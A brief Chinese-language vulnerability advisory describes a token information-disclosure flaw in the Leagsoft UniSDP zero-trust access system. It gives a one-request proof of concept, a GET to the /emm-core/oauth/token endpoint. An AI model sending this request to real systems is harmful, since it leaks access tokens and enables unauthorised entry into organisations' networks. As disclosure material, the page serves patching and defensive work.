联软 UniSDP 零信任访问控制系统 token 信息泄露漏洞

2024-08-09 联软UniSDP PoC Public

Description

联软 UniSDP 零信任访问控制系统存在信息泄露漏洞,该漏洞是由于token接口对用户的权限校验不当导致的。

PoC

GET /emm-core/oauth/token HTTP/1.1
Host: 
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36 Edg/[REDACTED]

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

Related Vulnerabilities